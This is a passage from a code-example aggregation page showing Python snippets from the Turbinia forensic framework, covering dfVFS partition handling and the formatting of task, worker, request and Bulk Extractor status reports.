                        volume_identifier)

                    if is_lvm:
                        # LVM Logical Volume UUID
                        lv_uuid = volume.GetAttribute('identifier')
                        if lv_uuid:
                            lv_uuid = lv_uuid.value

                    partition_offset = volume.extents[0].offset
                    partition_size = volume.extents[0].size
                except dfvfs_errors.VolumeSystemError as e:
                    raise TurbiniaException(
                        'Could not process partition: {0!s}'.format(e))
                break

            path_spec = path_spec.parent

        status_report.append(fmt.heading5('{0!s}:'.format(fs_location)))
        status_report.append(
            fmt.bullet('Filesystem: {0!s}'.format(
                fs_path_spec.type_indicator)))
        if volume_index is not None:
            status_report.append(
                fmt.bullet('Volume index: {0!s}'.format(volume_index)))
        if partition_index is not None:
            status_report.append(
                fmt.bullet('Partition index: {0!s}'.format(partition_index)))
            status_report.append(
                fmt.bullet('Partition offset: {0!s}'.format(partition_offset)))
            status_report.append(
                fmt.bullet('Partition size: {0!s}'.format(partition_size)))
        if volume_index is None and partition_index is None:
            status_report.append(
                fmt.bullet('Source evidence is a volume image'))

        # Not setting path_spec here as it will need to be generated for each task
        partition_evidence = DiskPartition(partition_location=fs_location,
                                           partition_offset=partition_offset,
                                           partition_size=partition_size,
                                           lv_uuid=lv_uuid)

        return partition_evidence, status_report
Exemple #25
0
    def format_task_status(self,
                           instance,
                           project,
                           region,
                           days=0,
                           task_id=None,
                           request_id=None,
                           group_id=None,
                           user=None,
                           all_fields=False,
                           full_report=False,
                           priority_filter=Priority.HIGH,
                           output_json=False,
                           report=None):
        """Formats the recent history for Turbinia Tasks.

    Args:
      instance (string): The Turbinia instance name (by default the same as the
          INSTANCE_ID in the config).
      project (string): The name of the project.
      region (string): The name of the zone to execute in.
      days (int): The number of days we want history for.
      task_id (string): The Id of the task.
      request_id (string): The Id of the request we want tasks for.
      group_id (string): Group Id of the requests.
      user (string): The user of the request we want tasks for.
      all_fields (bool): Include all fields for the task, including task,
          request ids and saved file paths.
      full_report (bool): Generate a full markdown report instead of just a
          summary.
      priority_filter (int): Output only a summary for Tasks with a value
          greater than the priority_filter.
      output_json (bool): Whether to return JSON output.
      report (string): Status report that will be returned.

    Returns:
      String of task status in JSON or human readable format.
    """
        if user and days == 0:
            days = 1000
        task_results = self.get_task_data(instance,
                                          project,
                                          region,
                                          days,
                                          task_id,
                                          request_id,
                                          group_id,
                                          user,
                                          output_json=output_json)
        if not task_results:
            return ''

        if output_json:
            return task_results

        # Sort all tasks by the report_priority so that tasks with a higher
        # priority are listed first in the report.
        for result in task_results:
            # 0 is a valid value, so checking against specific values
            if result.get('report_priority') in (None, ''):
                result['report_priority'] = Priority.LOW
        task_results = sorted(task_results, key=itemgetter('report_priority'))
        num_results = len(task_results)
        if not num_results:
            msg = 'No Turbinia Tasks found.'
            log.info(msg)
            return '\n{0:s}'.format(msg)

        # Build up data
        if report is None:
            report = []
        success_types = ['Successful', 'Failed', 'Scheduled or Running']
        success_values = [True, False, None]
        # Reverse mapping values to types
        success_map = dict(zip(success_values, success_types))
        # This is used for group ID status
        requests = defaultdict(dict)
        requester = task_results[0].get('requester')
        request_id = task_results[0].get('request_id')
        task_map = defaultdict(list)
        success_types.insert(0, 'High Priority')
        for task in task_results:
            if task.get('request_id') not in requests:
                requests[task.get('request_id')] = {
                    'Successful': 0,
                    'Failed': 0,
                    'Scheduled or Running': 0
                }
            requests[task.get('request_id')][success_map[task.get(
                'successful')]] += 1
            if task.get('report_priority') <= priority_filter:
                task_map['High Priority'].append(task)
            else:
                task_map[success_map[task.get('successful')]].append(task)

        if group_id:
            report.append('\n')
            report.append(
                fmt.heading1(
                    'Turbinia report for group ID {0:s}'.format(group_id)))
            for request_id, success_counts in requests.items():
                report.append(
                    fmt.bullet(
                        'Request Id {0:s} with {1:d} successful, {2:d} failed, and {3:d} running tasks.'
                        .format(request_id, success_counts['Successful'],
                                success_counts['Failed'],
                                success_counts['Scheduled or Running'])))
                if full_report:
                    self.format_task_status(instance,
                                            project,
                                            region,
                                            days=0,
                                            task_id=None,
                                            request_id=request_id,
                                            user=user,
                                            all_fields=all_fields,
                                            full_report=full_report,
                                            priority_filter=priority_filter,
                                            output_json=output_json,
                                            report=report)

            return '\n'.join(report)

        # Generate report header
        report.append('\n')
        report.append(fmt.heading1('Turbinia report {0:s}'.format(request_id)))
        report.append(
            fmt.bullet('Processed {0:d} Tasks for user {1:s}'.format(
                num_results, requester)))

        # Print report data for tasks
        for success_type in success_types:
            report.append('')
            report.append(fmt.heading1('{0:s} Tasks'.format(success_type)))
            if not task_map[success_type]:
                report.append(fmt.bullet('None'))
            task_counter = defaultdict(int)
            for task in task_map[success_type]:
                if full_report and success_type == success_types[0]:
                    report.extend(
                        self.format_task_detail(task, show_files=all_fields))
                elif success_type == success_types[2]:
                    report.extend(self.format_task(task,
                                                   show_files=all_fields))
                else:
                    task_counter['\n'.join(
                        self.format_task(task, show_files=all_fields))] += 1

            if len(task_counter):
                for k, v in task_counter.items():
                    if v == 1:
                        report.append(k)
                    else:
                        report.append('{0:s} x {1:d}'.format(k, v))

        return '\n'.join(report)
    def _ProcessPartition(self, evidence_path, path_spec):
        """Generate RawDiskPartition from a PathSpec.

    Args:
      evidence_path (str): Local path of the parent evidence
      path_spec (dfvfs.PathSpec): dfVFS path spec.

    Returns:
      A new RawDiskPartition evidence item and a list of strings containing
      partition information to add to the status report.
    """
        status_report = []

        fs_path_spec = path_spec
        fs_location = None
        partition_location = None
        volume_index = None
        partition_index = None
        partition_offset = None
        partition_size = None

        # File system location / identifier
        fs_location = getattr(path_spec, 'location', None)
        while path_spec.HasParent():
            type_indicator = path_spec.type_indicator
            if type_indicator == dfvfs_definitions.TYPE_INDICATOR_APFS_CONTAINER:
                # APFS volume index
                volume_index = getattr(path_spec, 'volume_index', None)

            if type_indicator == dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION:
                if fs_location in ('\\', '/'):
                    # Partition location / identifier
                    fs_location = getattr(path_spec, 'location', None)
                partition_location = getattr(path_spec, 'location', None)
                # Partition index
                partition_index = getattr(path_spec, 'part_index', None)

                volume_system = tsk_volume_system.TSKVolumeSystem()
                try:
                    volume_system.Open(path_spec)
                    volume_identifier = partition_location.replace('/', '')
                    volume = volume_system.GetVolumeByIdentifier(
                        volume_identifier)

                    partition_offset = volume.extents[0].offset
                    partition_size = volume.extents[0].size
                except dfvfs_errors.VolumeSystemError as e:
                    raise TurbiniaException(
                        'Could not process partition: {0!s}'.format(e))
                break

            path_spec = path_spec.parent

        status_report.append(fmt.heading5('{0!s}:'.format(fs_location)))
        if partition_index:
            if not volume_index is None:
                status_report.append(
                    fmt.bullet('Volume index: {0!s}'.format(volume_index)))
            status_report.append(
                fmt.bullet('Partition index: {0!s}'.format(partition_index)))
            status_report.append(
                fmt.bullet('Partition offset: {0!s}'.format(partition_offset)))
            status_report.append(
                fmt.bullet('Partition size: {0!s}'.format(partition_size)))
        else:
            status_report.append(
                fmt.bullet('Source evidence is a volume image'))

        partition_evidence = RawDiskPartition(
            source_path=evidence_path,
            path_spec=fs_path_spec,
            partition_offset=partition_offset,
            partition_size=partition_size)

        return partition_evidence, status_report
Exemple #27
0
  def format_worker_status(
      self, instance, project, region, days=0, all_fields=False):
    """Formats the recent history for Turbinia Workers.

    Args:
      instance (string): The Turbinia instance name (by default the same as the
          INSTANCE_ID in the config).
      project (string): The name of the project.
      region (string): The name of the zone to execute in.
      days (int): The number of days we want history for.
      all_fields (bool): Include historical Task information for the worker.
    Returns:
      String of Request status
    """
    # Set number of days to retrieve data
    num_days = 7
    if days != 0:
      num_days = days
    task_results = self.get_task_data(instance, project, region, days=num_days)
    if not task_results:
      return ''

    # Sort task_results by last updated timestamp.
    task_results = sorted(
        task_results, key=itemgetter('last_update'), reverse=True)

    # Create dictionary of worker_node: {{task_id, task_update,
    # task_name, task_status}}
    workers_dict = {}
    scheduled_counter = 0
    for result in task_results:
      worker_node = result.get('worker_name')
      status = result.get('status')
      status = status if status else 'No task status'
      if worker_node and worker_node not in workers_dict:
        workers_dict[worker_node] = []
      if worker_node:
        task_dict = {}
        task_dict['task_id'] = result.get('id')
        task_dict['last_update'] = result.get('last_update')
        task_dict['task_name'] = result.get('name')
        task_dict['status'] = status
        # Check status for anything that is running.
        if 'running' in status:
          run_time = (datetime.now() -
                      result.get('last_update')).total_seconds()
          run_time = timedelta(seconds=run_time)
          task_dict['run_time'] = run_time
        else:
          run_time = result.get('run_time')
          task_dict['run_time'] = run_time if run_time else 'No run time.'
        workers_dict[worker_node].append(task_dict)
      else:
        # Track scheduled/unassigned Tasks for reporting.
        scheduled_counter += 1

    # Generate report header
    report = []
    report.append(
        fmt.heading1(
            'Turbinia report for Worker activity within {0:d} days'.format(
                num_days)))
    report.append(
        fmt.bullet('{0:d} Worker(s) found.'.format(len(workers_dict.keys()))))
    report.append(
        fmt.bullet(
            '{0:d} Task(s) unassigned or scheduled and pending Worker assignment.'
            .format(scheduled_counter)))
    for worker_node, tasks in workers_dict.items():
      report.append('')
      report.append(fmt.heading2('Worker Node: {0:s}'.format(worker_node)))
      # Append the statuses chronologically
      run_status, queued_status, other_status = [], [], []
      for task in tasks:
        if 'running' in task['status']:
          run_status.extend(self.format_worker_task(task))
        elif 'queued' in task['status']:
          queued_status.extend(self.format_worker_task(task))
        else:
          other_status.extend(self.format_worker_task(task))
      # Add each of the status lists back to report list
      not_found = [fmt.bullet('No Tasks found.')]
      report.append(fmt.heading3('Running Tasks'))
      report.extend(run_status if run_status else not_found)
      report.append('')
      report.append(fmt.heading3('Queued Tasks'))
      report.extend(queued_status if queued_status else not_found)
      # Add Historical Tasks
      if all_fields:
        report.append('')
        report.append(fmt.heading3('Finished Tasks'))
        report.extend(other_status if other_status else not_found)
    return '\n'.join(report)
Exemple #28
0
  def generate_summary_report(self, output_file_path):
    """Generate a summary report from the resulting bulk extractor run.

    Args:
      output_file_path(str): the path to the bulk extractor output.

    Returns:
      tuple: containing:
        report_test(str): The report data
        summary(str): A summary of the report (used for task status)
    """
    findings = []
    features_count = 0
    report_path = os.path.join(output_file_path, 'report.xml')

    # Check if report.xml was not generated by bulk extractor.
    if not os.path.exists(report_path):
      report = 'Execution successful, but the report is not available.'
      return (report, report)

    # Parse existing XML file.
    self.xml = xml_tree.parse(report_path)

    # Place in try/except statement to continue execution when
    # an attribute is not found and NoneType is returned.
    try:
      # Retrieve summary related results.
      findings.append(fmt.heading4('Bulk Extractor Results'))
      findings.append(fmt.heading5('Run Summary'))
      findings.append(
          fmt.bullet(
              'Program: {0} - {1}'.format(
                  self.check_xml_attrib('creator/program'),
                  self.check_xml_attrib('creator/version'))))
      findings.append(
          fmt.bullet(
              'Command Line: {0}'.format(
                  self.check_xml_attrib(
                      'creator/execution_environment/command_line'))))
      findings.append(
          fmt.bullet(
              'Start Time: {0}'.format(
                  self.check_xml_attrib(
                      'creator/execution_environment/start_time'))))
      findings.append(
          fmt.bullet(
              'Elapsed Time: {0}'.format(
                  self.check_xml_attrib('report/elapsed_seconds'))))

      # Retrieve results from each of the scanner runs
      feature_files = self.xml.find('feature_files')
      if feature_files is not None:
        feature_iter = feature_files.iter()
        findings.append(fmt.heading5('Scanner Results'))
        for f in feature_iter:
          if f.tag == 'feature_file':
            name = next(feature_iter)
            count = next(feature_iter)
            findings.append(fmt.bullet('{0}:{1}'.format(name.text, count.text)))
            features_count += int(count.text)
      else:
        findings.append(fmt.heading5("There are no findings to report."))
    except AttributeError as exception:
      log.warning(
          'Error parsing feature from Bulk Extractor report: {0!s}'.format(
              exception))
    summary = '{0} artifacts have been extracted.'.format(features_count)
    report = '\n'.join(findings)
    return (report, summary)
Exemple #29
0
  def format_request_status(
      self, instance, project, region, days=0, all_fields=False):
    """Formats the recent history for Turbinia Requests.

    Args:
      instance (string): The Turbinia instance name (by default the same as the
          INSTANCE_ID in the config).
      project (string): The name of the project.
      region (string): The name of the zone to execute in.
      days (int): The number of days we want history for.
      all_fields (bool): Include all fields for the Request, which includes,
          saved file paths.
    Returns:
      String of Request status
    """
    # Set number of days to retrieve data
    num_days = 7
    if days != 0:
      num_days = days
    task_results = self.get_task_data(instance, project, region, days=num_days)
    if not task_results:
      return ''

    # Sort task_results by last updated timestamp.
    task_results = sorted(
        task_results, key=itemgetter('last_update'), reverse=True)

    # Create dictionary of request_id: {saved_paths, last_update, requester,
    # task_id}
    request_dict = {}
    for result in task_results:
      request_id = result.get('request_id')
      saved_paths = result.get('saved_paths')
      if request_id not in request_dict:
        saved_paths = set(saved_paths) if saved_paths else set()
        request_dict[request_id] = {}
        request_dict[request_id]['saved_paths'] = saved_paths
        request_dict[request_id]['last_update'] = result.get('last_update')
        request_dict[request_id]['requester'] = result.get('requester')
        request_dict[request_id]['task_id'] = set([result.get('id')])
      else:
        if saved_paths:
          request_dict[request_id]['saved_paths'].update(saved_paths)
        request_dict[request_id]['task_id'].update([result.get('id')])

    # Generate report header
    report = []
    report.append(
        fmt.heading1(
            'Turbinia report for Requests made within {0:d} days'.format(
                num_days)))
    report.append(
        fmt.bullet(
            '{0:d} requests were made within this timeframe.'.format(
                len(request_dict.keys()))))
    # Print report data for Requests
    for request_id, values in request_dict.items():
      report.append('')
      report.append(fmt.heading2('Request ID: {0:s}'.format(request_id)))
      report.append(
          fmt.bullet(
              'Last Update: {0:s}'.format(
                  values['last_update'].strftime(DATETIME_FORMAT))))
      report.append(fmt.bullet('Requester: {0:s}'.format(values['requester'])))
      report.append(
          fmt.bullet('Task Count: {0:d}'.format(len(values['task_id']))))
      if all_fields:
        report.append(fmt.bullet('Associated Evidence:'))
        # Append all saved paths in request
        for path in sorted(values['saved_paths']):
          report.append(fmt.bullet(fmt.code(path), level=2))
        report.append('')
    return '\n'.join(report)